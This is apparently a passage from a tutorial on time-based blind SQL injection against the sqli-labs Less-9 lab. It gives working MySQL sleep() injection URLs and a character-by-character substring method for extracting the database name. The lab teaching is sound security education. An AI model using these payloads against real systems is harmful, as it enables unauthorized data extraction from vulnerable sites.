Time to move on to time-based SQLi.
Time based SQLi
The process is almost the same as boolean-based. What changes is the way we tell a true condition from a false one: this level returns the same page whether the injected condition is true or false, so instead of comparing response content we measure how long the response takes. Let's visit level 9 of sqli-labs.
The way to identify a true condition is MySQL's sleep() function, chained to the condition with and:
(condition) and sleep(10)
If the condition is true, sleep(10) is evaluated and the response arrives about 10 seconds later; if it is false, MySQL stops evaluating the and chain at the first false term and the page loads immediately.
Let's verify that it works properly (the + after -- is URL-decoded to the space that MySQL's -- comment requires):
http://192.168.1.11/sqli-labs-master/Less-9/?id=1' and sleep(10) --+
And the web page takes about 10 seconds to load.
Now we perform the first query. Note the order: the condition goes first and sleep(10) last. If 1=1 is true the page waits 10 seconds; with 1=2 instead it would load immediately:
http://192.168.1.11/sqli-labs-master/Less-9/?id=1' and 1=1 and sleep(10) --+
Written the other way round (and sleep(10) and 1=1), the delay would happen regardless of the condition, because sleep() is evaluated first, waits, and returns 0, so the condition after it is never even checked.
The next step is to extract useful information, for example confirming the name of the current database:
http://192.168.1.11/sqli-labs-master/Less-9/?id=1' and database()='security' and sleep(10) --+
And the way to extract the database name, or anything else we need, without guessing it whole is again the substring function, one character per request:
http://192.168.1.11/sqli-labs-master/Less-9/?id=1' and substring(database(),1,1)='s' and sleep(10) --+
A 10-second delay confirms that the first character is 's'; then we move on to substring(database(),2,1) and so on. Two caveats: with MySQL's default case-insensitive collations 'S' would match too (compare ascii(substring(...)) or use binary if case matters), and every request costs up to the full sleep time, so use the shortest delay your network lets you tell apart from normal latency.